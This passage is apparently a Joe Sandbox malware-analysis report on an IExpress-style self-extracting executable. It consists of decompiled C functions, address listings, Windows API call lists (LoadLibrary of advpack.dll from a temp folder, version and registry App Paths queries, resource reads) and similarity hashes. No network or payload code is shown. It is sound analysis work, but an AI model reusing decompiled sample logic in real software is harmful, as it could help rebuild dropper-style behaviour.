                                                                                                                                                                                                                                              0x009739fc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739fc
                                                                                                                                                                                                                                              0x009739d3
                                                                                                                                                                                                                                              0x009739d8
                                                                                                                                                                                                                                              0x009739da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739dc
                                                                                                                                                                                                                                              0x009739b6
                                                                                                                                                                                                                                              0x00973955
                                                                                                                                                                                                                                              0x0097395b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973961
                                                                                                                                                                                                                                              0x00973963
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973969
                                                                                                                                                                                                                                              0x00973969
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973969
                                                                                                                                                                                                                                              0x00973915
                                                                                                                                                                                                                                              0x00973915
                                                                                                                                                                                                                                              0x0097391b
                                                                                                                                                                                                                                              0x0097391f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097392d
                                                                                                                                                                                                                                              0x00973933
                                                                                                                                                                                                                                              0x00973938
                                                                                                                                                                                                                                              0x0097393a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973940
                                                                                                                                                                                                                                              0x00973946
                                                                                                                                                                                                                                              0x0097394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009738f2
                                                                                                                                                                                                                                              0x00973843
                                                                                                                                                                                                                                              0x00973845
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097384b
                                                                                                                                                                                                                                              0x0097384d
                                                                                                                                                                                                                                              0x00973883
                                                                                                                                                                                                                                              0x00973885
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097389a
                                                                                                                                                                                                                                              0x0097389e
                                                                                                                                                                                                                                              0x0097389e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009738a0
                                                                                                                                                                                                                                              0x009738a0
                                                                                                                                                                                                                                              0x009738a2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009738a4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009738a4
                                                                                                                                                                                                                                              0x0097384f
                                                                                                                                                                                                                                              0x00973851
                                                                                                                                                                                                                                              0x00973857
                                                                                                                                                                                                                                              0x0097386e
                                                                                                                                                                                                                                              0x00973877
                                                                                                                                                                                                                                              0x0097387b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973881
                                                                                                                                                                                                                                              0x00973859
                                                                                                                                                                                                                                              0x0097385c
                                                                                                                                                                                                                                              0x00973862
                                                                                                                                                                                                                                              0x00973866
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973868
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009738f4
                                                                                                                                                                                                                                              0x009738f4
                                                                                                                                                                                                                                              0x009738f5
                                                                                                                                                                                                                                              0x009738fb
                                                                                                                                                                                                                                              0x00973901
                                                                                                                                                                                                                                              0x00973901
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097390a
                                                                                                                                                                                                                                              0x0097374b
                                                                                                                                                                                                                                              0x0097374e
                                                                                                                                                                                                                                              0x0097375c
                                                                                                                                                                                                                                              0x00973764
                                                                                                                                                                                                                                              0x00973769
                                                                                                                                                                                                                                              0x0097376e
                                                                                                                                                                                                                                              0x00973771
                                                                                                                                                                                                                                              0x0097379c
                                                                                                                                                                                                                                              0x0097379f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009737a3
                                                                                                                                                                                                                                              0x009737a4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009737a4
                                                                                                                                                                                                                                              0x00973773
                                                                                                                                                                                                                                              0x00973777
                                                                                                                                                                                                                                              0x00973778
                                                                                                                                                                                                                                              0x0097377f
                                                                                                                                                                                                                                              0x00973781
                                                                                                                                                                                                                                              0x0097378e
                                                                                                                                                                                                                                              0x0097378e
                                                                                                                                                                                                                                              0x00973794
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973794
                                                                                                                                                                                                                                              0x00973783
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973785
                                                                                                                                                                                                                                              0x0097378c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097378c
                                                                                                                                                                                                                                              0x00973750
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097372d
                                                                                                                                                                                                                                              0x0097372d
                                                                                                                                                                                                                                              0x0097396b
                                                                                                                                                                                                                                              0x0097396b
                                                                                                                                                                                                                                              0x0097396c
                                                                                                                                                                                                                                              0x0097396e
                                                                                                                                                                                                                                              0x0097396f
                                                                                                                                                                                                                                              0x00973a1e
                                                                                                                                                                                                                                              0x00973a1e
                                                                                                                                                                                                                                              0x00973a22
                                                                                                                                                                                                                                              0x00973a27
                                                                                                                                                                                                                                              0x00973a3e
                                                                                                                                                                                                                                              0x00973a3e

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00973723
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 009739C3
                                                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 009739F1
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$BeepVersion
                                                                                                                                                                                                                                              • String ID: 3$lenta
                                                                                                                                                                                                                                              • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                              • Opcode ID: afb50dab65dcf22d9b071682efee96b34c4d691fc957cd787fd9dd5fc7a8d8c7
                                                                                                                                                                                                                                              • Instruction ID: ed99738cf56bad5b2e581903d003d95f9eeb869699c6c3e2bb34d4d1d90e07f6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afb50dab65dcf22d9b071682efee96b34c4d691fc957cd787fd9dd5fc7a8d8c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D91F2B3B152259BEB388B15CD81BEA73B4EB81304F14C0A9D98D9B251D7748F81EF01
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                                                                              			E00976495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t27 = __esi;
                                                                                                                                                                                                                                              				_t18 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				E00971781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              				_t26 = "advpack.dll";
                                                                                                                                                                                                                                              				E0097658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                              				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x00976495
                                                                                                                                                                                                                                              0x00976495
                                                                                                                                                                                                                                              0x009764a0
                                                                                                                                                                                                                                              0x009764a7
                                                                                                                                                                                                                                              0x009764ab
                                                                                                                                                                                                                                              0x009764bd
                                                                                                                                                                                                                                              0x009764c2
                                                                                                                                                                                                                                              0x009764d3
                                                                                                                                                                                                                                              0x009764df
                                                                                                                                                                                                                                              0x009764e8
                                                                                                                                                                                                                                              0x00976502
                                                                                                                                                                                                                                              0x009764ee
                                                                                                                                                                                                                                              0x009764f9
                                                                                                                                                                                                                                              0x009764f9
                                                                                                                                                                                                                                              0x00976516

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 009764DF
                                                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 009764F9
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00976502
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                              • API String ID: 438848745-3680919256
                                                                                                                                                                                                                                              • Opcode ID: d59a380f027e92788f37a0fad7194d907075103eb0d7a93de6ca3b712d315626
                                                                                                                                                                                                                                              • Instruction ID: 423149ca0caa90c2f24e5e247cfe0629c0c7bd500edd2a66876af3608a48bb2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d59a380f027e92788f37a0fad7194d907075103eb0d7a93de6ca3b712d315626
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C01D132A18108ABDB20DB74DC4ABEE7378EBD1711F904195F58D921C0DF709ECADA51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				char* _v12;
                                                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                                                                              				int _v28;
                                                                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                                                                              				void* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                                                                              				long _t68;
                                                                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                                                                              				intOrPtr _t93;
                                                                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                                                                                                              				int _t101;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                                                                              				void* _t109;
                                                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                                                                              				_t99 = __ecx;
                                                                                                                                                                                                                                              				_t106 = 0;
                                                                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				_t103 = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_t106 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t62 = 0;
                                                                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                              						if(E00972773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                              						_v28 = _t68;
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_t99 = _v16;
                                                                                                                                                                                                                                              							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                              							_t93 = _v24;
                                                                                                                                                                                                                                              							_t87 = _v20;
                                                                                                                                                                                                                                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                              							if(_t103 != 0) {
                                                                                                                                                                                                                                              								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                              								_v36 = _t73;
                                                                                                                                                                                                                                              								if(_t73 != 0) {
                                                                                                                                                                                                                                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                              										L15:
                                                                                                                                                                                                                                              										GlobalUnlock(_t103);
                                                                                                                                                                                                                                              										_t99 = _v16;
                                                                                                                                                                                                                                              										L18:
                                                                                                                                                                                                                                              										_t87 = _t87 + 1;
                                                                                                                                                                                                                                              										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										_v20 = _t87;
                                                                                                                                                                                                                                              										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L19;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t79 = _v44;
                                                                                                                                                                                                                                              										_t88 = _t106;
                                                                                                                                                                                                                                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                              										_t101 = _v28;
                                                                                                                                                                                                                                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                              										_t97 = _v48;
                                                                                                                                                                                                                                              										_v36 = _t83;
                                                                                                                                                                                                                                              										_t109 = _t83;
                                                                                                                                                                                                                                              										do {
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00972A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00972A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                              											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                              											_t88 = _t88 + 4;
                                                                                                                                                                                                                                              										} while (_t88 < 8);
                                                                                                                                                                                                                                              										_t87 = _v20;
                                                                                                                                                                                                                                              										_t106 = 0;
                                                                                                                                                                                                                                              										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                              											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                              												GlobalUnlock(_t103);
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												goto L15;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L15;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L20:
                                                                                                                                                                                                                                              				 *_a8 = _t87;
                                                                                                                                                                                                                                              				if(_t103 != 0) {
                                                                                                                                                                                                                                              					GlobalFree(_t103);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t106;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x009728f1
                                                                                                                                                                                                                                              0x009728f4
                                                                                                                                                                                                                                              0x009728f7
                                                                                                                                                                                                                                              0x009728f9
                                                                                                                                                                                                                                              0x009728fc
                                                                                                                                                                                                                                              0x009728ff
                                                                                                                                                                                                                                              0x00972901
                                                                                                                                                                                                                                              0x00972907
                                                                                                                                                                                                                                              0x00972a62
                                                                                                                                                                                                                                              0x00972a64
                                                                                                                                                                                                                                              0x0097290d
                                                                                                                                                                                                                                              0x0097290d
                                                                                                                                                                                                                                              0x0097290f
                                                                                                                                                                                                                                              0x00972912
                                                                                                                                                                                                                                              0x00972920
                                                                                                                                                                                                                                              0x00972937
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972944
                                                                                                                                                                                                                                              0x0097294a
                                                                                                                                                                                                                                              0x0097294f
                                                                                                                                                                                                                                              0x00972a2f
                                                                                                                                                                                                                                              0x00972a32
                                                                                                                                                                                                                                              0x00972a34
                                                                                                                                                                                                                                              0x00972a37
                                                                                                                                                                                                                                              0x00972a41
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972955
                                                                                                                                                                                                                                              0x0097295e
                                                                                                                                                                                                                                              0x00972962
                                                                                                                                                                                                                                              0x00972969
                                                                                                                                                                                                                                              0x0097296f
                                                                                                                                                                                                                                              0x00972974
                                                                                                                                                                                                                                              0x0097298c
                                                                                                                                                                                                                                              0x00972a20
                                                                                                                                                                                                                                              0x00972a21
                                                                                                                                                                                                                                              0x00972a27
                                                                                                                                                                                                                                              0x00972a4c
                                                                                                                                                                                                                                              0x00972a4f
                                                                                                                                                                                                                                              0x00972a50
                                                                                                                                                                                                                                              0x00972a53
                                                                                                                                                                                                                                              0x00972a56
                                                                                                                                                                                                                                              0x00972a5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009729b2
                                                                                                                                                                                                                                              0x009729b2
                                                                                                                                                                                                                                              0x009729b5
                                                                                                                                                                                                                                              0x009729bd
                                                                                                                                                                                                                                              0x009729c3
                                                                                                                                                                                                                                              0x009729cc
                                                                                                                                                                                                                                              0x009729d5
                                                                                                                                                                                                                                              0x009729d7
                                                                                                                                                                                                                                              0x009729da
                                                                                                                                                                                                                                              0x009729dd
                                                                                                                                                                                                                                              0x009729df
                                                                                                                                                                                                                                              0x009729ec
                                                                                                                                                                                                                                              0x009729f8
                                                                                                                                                                                                                                              0x009729fc
                                                                                                                                                                                                                                              0x009729ff
                                                                                                                                                                                                                                              0x00972a02
                                                                                                                                                                                                                                              0x00972a07
                                                                                                                                                                                                                                              0x00972a0a
                                                                                                                                                                                                                                              0x00972a0f
                                                                                                                                                                                                                                              0x00972a19
                                                                                                                                                                                                                                              0x00972a81
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972a0f
                                                                                                                                                                                                                                              0x0097298c
                                                                                                                                                                                                                                              0x00972974
                                                                                                                                                                                                                                              0x00972962
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097294f
                                                                                                                                                                                                                                              0x00972912
                                                                                                                                                                                                                                              0x00972a65
                                                                                                                                                                                                                                              0x00972a68
                                                                                                                                                                                                                                              0x00972a6c
                                                                                                                                                                                                                                              0x00972a6f
                                                                                                                                                                                                                                              0x00972a6f
                                                                                                                                                                                                                                              0x00972a7d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00972A6F
                                                                                                                                                                                                                                                • Part of subcall function 00972773: CharUpperA.USER32(694569F9,00000000,00000000,00000000), ref: 009727A8
                                                                                                                                                                                                                                                • Part of subcall function 00972773: CharNextA.USER32(0000054D), ref: 009727B5
                                                                                                                                                                                                                                                • Part of subcall function 00972773: CharNextA.USER32(00000000), ref: 009727BC
                                                                                                                                                                                                                                                • Part of subcall function 00972773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972829
                                                                                                                                                                                                                                                • Part of subcall function 00972773: RegQueryValueExA.ADVAPI32(?,00971140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972852
                                                                                                                                                                                                                                                • Part of subcall function 00972773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972870
                                                                                                                                                                                                                                                • Part of subcall function 00972773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009728A0
                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00973938,?,?,?,?,-00000005), ref: 00972958
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 00972969
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00973938,?,?,?,?,-00000005,?), ref: 00972A21
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00972A81
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3949799724-0
                                                                                                                                                                                                                                              • Opcode ID: 2ae8872879f680938a9df75b40618692ef027882c84192de252b1a1b1df1ef80
                                                                                                                                                                                                                                              • Instruction ID: 7800b7eb652fb1183a55af6f8bdef61849582ad1ca66c62dcdff12ea80c3ccf3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ae8872879f680938a9df75b40618692ef027882c84192de252b1a1b1df1ef80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9512C32E10219DFCF25CF98C884AAEFBB9FF88700F14802AE919E3251D7319941DB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 32%
                                                                                                                                                                                                                                              			E00974169(void* __eflags) {
                                                                                                                                                                                                                                              				int _t18;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = E0097468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                              					if(E0097468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							return LocalFree(_t21);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(0x40);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t21);
                                                                                                                                                                                                                                              						_t18 = 0x3e9;
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						E009744B9(0, _t18);
                                                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_t18 = 0x4b1;
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E009744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x0097417d
                                                                                                                                                                                                                                              0x0097418f
                                                                                                                                                                                                                                              0x00974193
                                                                                                                                                                                                                                              0x009741b7
                                                                                                                                                                                                                                              0x009741d3
                                                                                                                                                                                                                                              0x009741e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009741e7
                                                                                                                                                                                                                                              0x009741d5
                                                                                                                                                                                                                                              0x009741d6
                                                                                                                                                                                                                                              0x009741d8
                                                                                                                                                                                                                                              0x009741d9
                                                                                                                                                                                                                                              0x009741da
                                                                                                                                                                                                                                              0x009741df
                                                                                                                                                                                                                                              0x009741e1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009741e1
                                                                                                                                                                                                                                              0x009741b9
                                                                                                                                                                                                                                              0x009741ba
                                                                                                                                                                                                                                              0x009741bc
                                                                                                                                                                                                                                              0x009741bd
                                                                                                                                                                                                                                              0x009741be
